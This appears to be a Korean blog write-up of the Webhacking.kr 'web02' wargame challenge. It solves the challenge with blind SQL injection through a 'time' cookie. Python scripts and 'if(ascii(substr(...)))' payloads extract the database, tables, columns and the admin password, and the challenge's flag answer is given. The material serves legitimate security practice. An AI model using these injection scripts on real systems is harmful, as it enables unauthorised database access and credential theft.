Webhacking.kr - web02
web02
1
2
3
4
time=1627716629 부분이 있는데 이 부분을 이용해보면 됨.
time에 1, 2 등 값을 넣어보면 2070-01-01 09:00:01에 고정이 됨.
이를 이용해서 time에 query를 입력해서 admin 비밀번호를 구해야함.
Solution
1
2
3
4
5
6
time=if(1=1,1627716629,1) 를 해주면 참이므로 2021-07-31 04:30:29
거짓이면 2070-01-01 09:00:01 이 될 것임.
이를 이용해서 blind sql injection으로 값을 구해면 됨.
db 이름은 굳이 안구해도 됨.
1
2
3
1. database 길이을 구하면 6임.
time=if(length((select database()))=7,1627716629,0)
1
2
3
4
5
2. database 명
time=if(ascii(substr((select database()),1,1))=48,1627716629,0)
구하면 다음과 같음. database : chall2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
url='https://webhacking.kr/challenge/web-02/'
headers={'Content-Type':'text/html'}
database='' # chall2
for i in range(1,7) :
for j in range(48,123):
cookies={
'PHPSESSID':'[redacted]',
'time':'if(ascii(substr((select database()),'+str(i)+',1))='+str(j)+',1627716629,0)'
}
res=requests.get(url, headers=headers, cookies=cookies)
if '2021-07-31 04:30:29' in res.text :
database+=chr(j)
print("database : ",database)
break
더 최적화를 시켜보면 다음과 같음.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
url='https://webhacking.kr/challenge/web-02/'
headers={'Content-Type':'text/html'}
database='' # chall2
bit_len=''
bit_val=''
for i in range(1,7) :
cookies={
'PHPSESSID':'[redacted]',
'time':'if(length(bin(ascii(substr((select database()),'+str(i)+',1))))=7,1627716629,0)'
}
res=requests.get(url, headers=headers, cookies=cookies)
if '2021-07-31 04:30:29' in res.text :
bit_len=7
else :
bit_len=6
for j in range(1,bit_len+1):
cookies={
'PHPSESSID':'[redacted]',
'time':'if(substr(bin(ascii(substr((select database()),'+str(i)+',1))),'+str(j)+',1)=0,1627716629,0)'
}
res=requests.get(url, headers=headers, cookies=cookies)
if '2021-07-31 04:30:29' in res.text :
bit_val+='0'
else :
bit_val+='1'
database+=chr(int(bit_val,2))
bit_val=''
print('database :',database)
1
2
3
4
5
3. db 명을 구했으므로 db 안에 있는 table 명을 구해야 함.
table 명은 여러개가 있을 것이므로 group_concat을 통해 한꺼번에 출력해보면 다음과 같음.
table : admin_area_pw,log,log
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
url='https://webhacking.kr/challenge/web-02/'
headers={'Content-Type':'text/html'}
table=''
bit_len=''
bit_val=''
for i in range(1,100) :
cookies={
'PHPSESSID':'[redacted]',
'time':'if(length(bin(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema="chall2"),'+str(i)+',1))))=7,1627716629,0)'
}
res=requests.get(url, headers=headers, cookies=cookies)
if '2021-07-31 04:30:29' in res.text :
bit_len=7
else :
bit_len=6
for j in range(1,bit_len+1):
cookies={
'PHPSESSID':'[redacted]',
'time':'if(substr(bin(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema="chall2"),'+str(i)+',1))),'+str(j)+',1)=0,1627716629,0)'
}
res=requests.get(url, headers=headers, cookies=cookies)
if '2021-07-31 04:30:29' in res.text :
bit_val+='0'
else :
bit_val+='1'
table+=chr(int(bit_val,2))
bit_val=''
print('table :',table) # admin_area_pw,log,log
1
2
3
4
5
6
7
4. admin_area_pw table안에 있는 column 명들을 뽑아주면 됨.
'time' 부분만 다음과 같이 수정해주면 됨.
'time':'if(length(bin(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="admin_area_pw"),'+str(i)+',1))))=7,1627716629,0)
'time':'if(substr(bin(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="admin_area_pw"),'+str(i)+',1))),'+str(j)+',1)=0,1627716629,0)'
column은 pw 컬럼 한 개 밖에 없었음.
1
2
3
4
5
6
5. 이제 컬럼에 있는 값들을 뽑아서 확인하면 끝
'time':'if(length(bin(ascii(substr((select group_concat(pw) from admin_area_pw),'+str(i)+',1))))=7,1627716629,0)
'time':'if(substr(bin(ascii(substr((select group_concat(pw) from admin_area_pw),'+str(i)+',1))),'+str(j)+',1)=0,1627716629,0)'
따라서 admin 아이디의 비밀번호는 pw : kudos_to_beistlab
This post is licensed under CC BY 4.0 by the author.